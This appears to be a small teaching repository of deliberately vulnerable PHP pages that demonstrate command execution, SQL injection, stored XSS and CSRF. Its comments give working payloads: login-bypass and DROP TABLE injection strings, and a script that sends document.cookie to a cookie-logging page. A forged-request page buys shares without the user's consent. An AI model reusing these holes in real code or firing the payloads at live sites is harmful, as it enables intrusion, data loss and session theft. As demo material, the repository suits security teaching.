├── .github
    └── FUNDING.yml
├── README.md
├── html
    ├── buy.php
    ├── exec.php
    ├── log.php
    ├── portfolio.php
    ├── sqlinject.php
    ├── xsrf.html
    └── xss.php
└── owasp.sql


/.github/FUNDING.yml:
--------------------------------------------------------------------------------
 1 | # These are supported funding model platforms
 2 | 
 3 | github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
 4 | patreon: # Replace with a single Patreon username
 5 | open_collective: # Replace with a single Open Collective username
 6 | ko_fi: # Replace with a single Ko-fi username
 7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
 8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
 9 | liberapay: # Replace with a single Liberapay username
10 | issuehunt: # Replace with a single IssueHunt username
11 | otechie: # Replace with a single Otechie username
12 | custom: http://paypal.me/jayaditya11
13 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # OWASP_DEMO
2 | just a bunch of vulnerable web pages for demo
3 | 
4 | ##Database
5 | Jut import the database using phpmyadmin or execute queries manually . 
6 | 
7 | No UI has been made  , it's just basic demo to show how some attacks works. 
8 | 


--------------------------------------------------------------------------------
/html/buy.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | /**********************************************************************
 3 |  * buy.php = For Cross-Site Request Forgery attack
 4 |  **********************************************************************/
 5 | 
 6 | // database connection 
 7 | $dsn = 'mysql:host=localhost;dbname=owasp';
 8 | $db_user = 'root';
 9 | $db_pass = ''; // enter password
10 | $dbh = new PDO($dsn, $db_user, $db_pass);
11 | 
12 | session_start();
13 | ?>
14 | 
15 | <html>
16 |     <head>
17 |         <title>Cross-Site Request Forgery</title>
18 |     </head>
19 |     <body>
20 | <?php
21 | // handle database inserts
22 | if (isset($_SESSION['id']) &&
23 |     isset($_GET['symbol']) &&
24 |     isset($_GET['shares']))
25 | {
26 |     $stmt = $dbh->prepare('INSERT INTO portfolios (id,symbol,shares)
27 |                            VALUES (:id,:symbol,:shares)');
28 |     $stmt->bindValue(':id',$_SESSION['id']);
29 |     $stmt->bindValue(':symbol',$_GET['symbol']);
30 |     $stmt->bindValue(':shares',$_GET['shares']);
31 |     $stmt->execute();
32 |     echo "<p>You just bought {$_GET['shares']} shares of {$_GET['symbol']}!</p>";
33 | }
34 | ?>
35 |     </body>
36 | </html>
37 | 


--------------------------------------------------------------------------------
/html/exec.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | /**********************************************************************
 3 |  * exec() attack
 4 |  * 
 5 |  * To demonstrate the exploit, try the following:
 6 |  * wget -qO- http://localhost:8080/owasp/html/exec.php --post-data="cmd=whoami"
 7 |  * wget -qO- http://localhost:8080/owasp/html/exec.php --post-data="cmd=uname -a"
 8 |  *
 9 |  **********************************************************************/
10 | 
11 | // handle command requests
12 | if (isset($_POST['cmd']))
13 |     exec($_POST['cmd'], $output);
14 | else
15 |     $output=array();
16 | 
17 | ?>
18 | <html>
19 |     <head>
20 |         <title>exec() Attack</title>
21 |     </head>
22 |     <body>
23 |         <p>Available commands:</p>
24 |         <form method="POST" action="exec.php">
25 |             <select name="cmd">
26 |                 <option value='date' selected='selected'>date</option>
27 |                 <option value='cal'>cal</option>
28 |                 <option value='ls'>ls</option>
29 |             </select>
30 |             <input type="submit" name="exec() it!" />
31 |         </form>
32 |         <hr />
33 |         <p>Output of last command:</p>
34 |         <pre>
35 | <?php
36 | foreach ($output as $line)
37 |     print "$line\n";
38 | ?>
39 |         </pre>
40 |     </body>
41 | </html>
42 | 


--------------------------------------------------------------------------------
/html/log.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | /**********************************************************************
 3 |  * Stored Cross-Site Scripting attack, part 2
 4 |  * 
 5 |  * This file logs cookies for us. :)
 6 |  *
 7 |  **********************************************************************/
 8 | 
 9 | // database connection 
10 | $dsn = 'mysql:host=localhost;dbname=owasp';
11 | $db_user = 'root';
12 | $db_pass = '';
13 | $dbh = new PDO($dsn, $db_user, $db_pass);
14 | 
15 | // handle database inserts
16 | if (isset($_GET['x']))
17 | {
18 |     $stmt = $dbh->prepare('INSERT INTO cookies (cookie) VALUES (:cookie)');
19 |     $stmt->bindValue(':cookie',$_GET['x']);
20 |     $stmt->execute();
21 | }
22 | 


--------------------------------------------------------------------------------
/html/portfolio.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | /**********************************************************************
 3 |  * portfolio.php - For Cross-Site Request Forgery attack
 4 |  **********************************************************************/
 5 | 
 6 | // database connection 
 7 | $dsn = 'mysql:host=localhost;dbname=owasp';
 8 | $db_user = 'root';
 9 | $db_pass = '';
10 | $dbh = new PDO($dsn, $db_user, $db_pass);
11 | 
12 | session_start();
13 | $_SESSION['id']=1;
14 | 
15 | // function to display portfolio
16 | function print_portfolio($dbh)
17 | {
18 |     print '<table border="1"><tr><th>Symbol</th><th>Shares</th></tr>';
19 |     foreach ($dbh->query(sprintf("SELECT symbol, shares
20 |                                   FROM portfolios
21 |                                   WHERE id='%s'", $_SESSION['id'])) as $holding)
22 |         print "<tr><td>{$holding[0]}</td><td>{$holding[1]}</td></tr>";
23 |     print '</table>';
24 | }
25 | 
26 | ?>
27 | 
28 | <html>
29 |     <head>
30 |         <title>Portfolio (Cross-Site Request Forgery)</title>
31 |     </head>
32 |     <body>
33 |         <p>Current portfolio:</p>
34 |         <?php print_portfolio($dbh); ?>
35 |     </body>
36 | </html>
37 | 


--------------------------------------------------------------------------------
/html/sqlinject.php:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 | 	<title>OWASP DEMO</title>
 5 | 	
 6 | 	<script src="//fast.eager.io/E2AE4lvdR0.js"></script>
 7 | </head>
 8 | <body>
 9 | 
10 | 
11 | 
12 | <?php
13 | /**********************************************************************
14 |  * SQL Injection attack
15 |  * 
16 |  * To demonstrate the exploit, try the following URL's:
17 |  *
18 |  * Fail:    http://localhost:8080/owasp/html/sqlinject.php?user=chris&password=badpwd
19 |  * Success: http://localhost:8080/owasp/html/sqlinject.php?user=chris&password=password
20 |  * Exploit: http://localhost:8080/owasp/html/sqlinject.php?user=chris&password='OR''='
21 |  * Exploit: http://localhost:8080/owasp/html/sqlinject.php?user=';DROP TABLE test;
22 |  **********************************************************************/
23 |  
24 | // database connection
25 | $dsn = 'mysql:host=localhost;dbname=owasp';
26 | $db_user = 'root';
27 | $db_password = '';
28 | $dbh = new PDO($dsn, $db_user, $db_password);
29 | 
30 | // login credentials
31 | $user = isset($_GET['user']) ? $_GET['user'] : '';
32 | $password = isset($_GET['password']) ? $_GET['password'] : '';
33 | 
34 | // database query to test login credentials
35 | $sql = sprintf("SELECT 1
36 |                 FROM users
37 |                 WHERE id='%s'
38 |                 AND pwd='%s'", $user, $password);
39 | 
40 | // authenticate user
41 | $success = false;
42 | foreach($dbh->query($sql) as $row)
43 | {
44 |     // if any rows returned, we logged in
45 |     $success = true;
46 | }
47 | 
48 | // print results
49 | if ($success)
50 |     echo "Successful login!\n";
51 | else
52 |     echo "Bad username or password\n";
53 | ?>
54 | </body>
55 | </html>
56 | 


--------------------------------------------------------------------------------
/html/xsrf.html:
--------------------------------------------------------------------------------
 1 | <!--
 2 | /**********************************************************************
 3 |  * Cross-Site Request Forgery attack
 4 |  **********************************************************************/
 5 | -->
 6 | <html>
 7 |     <head>
 8 |         <title>Cross-Site Request Forgery</title>
 9 |     </head>
10 |     <body>
11 |         <p>This is my completely benign website. Trust me.</p>
12 |         <script src="http://localhost:8080/owasp/html/buy.php?symbol=GOOG&shares=1000"></script>
13 |         <img alt="" src="http://localhost:8080/owasp/html/buy.php?symbol=YHOO&shares=1000" />
14 |     </body>
15 | </html>
16 | 


--------------------------------------------------------------------------------
/html/xss.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | /**********************************************************************
 3 |  * Stored Cross-Site Scripting attack
 4 |  * 
 5 |  * To demonstrate the exploit, try the following comments:
 6 |  * <script>alert("Hacked!");</script>
 7 |  * <script>alert(document.cookie);</script>
 8 |  * Hello!<script>x=XMLHttpRequest();x.open("GET","http://localhost:8080/owasp/html/log.php?x="+document.cookie,true);x.send();</script>
 9 |  * Hello!<script>x=XMLHttpRequest();x.open("GET","http://localhost:8080/owasp/html/log.php?x="+document.cookie,true);x.send();</script>
10 |  *
11 |  **********************************************************************/
12 | 
13 | // database connection 
14 | $dsn = 'mysql:host=localhost;dbname=owasp';
15 | $db_user = 'root';
16 | $db_pass = '';
17 | $dbh = new PDO($dsn, $db_user, $db_pass);
18 | 
19 | // create a dummy cookie
20 | session_start();
21 | setcookie('user', $db_user);
22 | setcookie('password', $db_pass);
23 | 
24 | // handle database inserts
25 | if (isset($_POST['comment']))
26 | {
27 |     $stmt = $dbh->prepare('INSERT INTO comments (comment) VALUES (:comment)');
28 |     $stmt->bindValue(':comment',$_POST['comment']);
29 |     $stmt->execute();
30 | }
31 | 
32 | // function to display all comments
33 | function print_comment_table($dbh)
34 | {
35 |     print '<table border="1"><tr><th>Comment</th></tr>';
36 |     foreach ($dbh->query('SELECT * FROM comments') as $comment)
37 |         print "<tr><td>{$comment[1]}</td></tr>";
38 |     print '</table>';
39 | }
40 | 
41 | ?>
42 | <html>
43 |     <head>
44 |         <title>Stored Cross-Site Scripting</title>
45 |     </head>
46 |     <body>
47 |         <p>Current comments:</p>
48 |         <?php print_comment_table($dbh); ?>
49 |         <p>Add a new comment:</p>
50 |         <form method="POST" action="xss.php">
51 |             <input type="text" name="comment" />
52 |             <input type="submit" name="Post" />
53 |         </form>
54 |     </body>
55 | </html>
56 | 


--------------------------------------------------------------------------------
/owasp.sql:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";
 4 | SET time_zone = "+00:00";
 5 | 
 6 | 
 7 | 
 8 | 
 9 | CREATE TABLE IF NOT EXISTS `comments` (
10 |   `id` int(11) NOT NULL AUTO_INCREMENT,
11 |   `comment` text NOT NULL,
12 |   PRIMARY KEY (`id`)
13 | ) ENGINE=InnoDB  DEFAULT CHARSET=latin1 AUTO_INCREMENT=14 ;
14 | 
15 | 
16 | 
17 | CREATE TABLE IF NOT EXISTS `cookies` (
18 |   `id` int(11) NOT NULL AUTO_INCREMENT,
19 |   `cookie` text NOT NULL,
20 |   PRIMARY KEY (`id`)
21 | ) ENGINE=InnoDB  DEFAULT CHARSET=latin1 AUTO_INCREMENT=9 ;
22 | 
23 | 
24 | 
25 | CREATE TABLE IF NOT EXISTS `portfolios` (
26 |   `id` int(11) NOT NULL,
27 |   `symbol` char(8) NOT NULL,
28 |   `shares` int(11) NOT NULL,
29 |   PRIMARY KEY (`id`,`symbol`)
30 | ) ENGINE=InnoDB DEFAULT CHARSET=latin1;
31 | 
32 | 
33 | 
34 | INSERT INTO `portfolios` (`id`, `symbol`, `shares`) VALUES
35 | (1, 'AAPL', 100);
36 | 
37 | 
38 | 
39 | CREATE TABLE IF NOT EXISTS `test` (
40 |   `id` int(11) NOT NULL AUTO_INCREMENT,
41 |   PRIMARY KEY (`id`)
42 | ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;
43 | 
44 | 
45 | 
46 | CREATE TABLE IF NOT EXISTS `users` (
47 |   `id` varchar(15) NOT NULL,
48 |   `pwd` varchar(15) NOT NULL,
49 |   PRIMARY KEY (`id`)
50 | ) ENGINE=InnoDB DEFAULT CHARSET=latin1;
51 | 
52 | 
53 | INSERT INTO `users` (`id`, `pwd`) VALUES
54 | ('alain', 'abc123'),
55 | ('chris', 'password'),
56 | ('david', 'secret'),
57 | ('peter', 'qwerty'),
58 | ('jay', 'test123'),
59 | ('spyros','owasp');
60 | 


--------------------------------------------------------------------------------